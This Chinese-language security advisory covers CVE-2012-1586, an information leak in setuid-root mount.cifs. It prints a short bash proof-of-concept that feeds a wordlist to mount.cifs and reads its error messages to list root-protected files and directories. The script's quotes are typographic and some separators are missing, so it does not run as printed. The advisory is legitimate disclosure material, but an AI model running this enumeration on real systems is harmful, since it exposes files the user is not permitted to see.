受影响系统:
Linux kernel 2.6
Linux kernel 2.4
GNU Common Internet File System (CIFS) 5.3
不受影响系统:
GNU Common Internet File System (CIFS) 5.4
描述:
BUGTRAQ ID: 53246
CVE ID: CVE-2012-1586
CIFS 是通用互联网文件系统协议,它使程序可以访问远程Internet计算机上的文件并要求此计算机的服务。CIFS 使用客户/服务器模式。
Common Internet File System (CIFS)在验证访问权限的实现上存在信息泄露漏洞,如果mount.cifs安装为setuid root程序,则用户可利用它获取文件和目录信息。
<*来源:Jesus Olmos Gonzalez (jolmos@isecauditors.com)
链接:https://attachments.samba.org/attachment.cgi?id=7416
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# !/bin/bash
# root enumerator 0day by jesus.olmos@blueliv.com @sha0coder # discover root protected files & directories, user homes, process descriptors, …
path=$2
wordlist=$1
for i in `cat $wordlist`
do
echo -n “$i:”
/sbin/mount.cifs //127.0.0.1/a $path/$i
done 2>log.$$ 1>&2
echo — directories —
for i in `grep ‘denied’ log.$$ | cut -d ‘:’ -f 1` do
echo $i
done
echo — files —
for i in `grep -i ‘not a directory’ log.$$ | cut -d ‘:’ -f 1` do
echo $i
done
rm log.$$
建议:
厂商补丁:
GNU
—
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
评论关闭。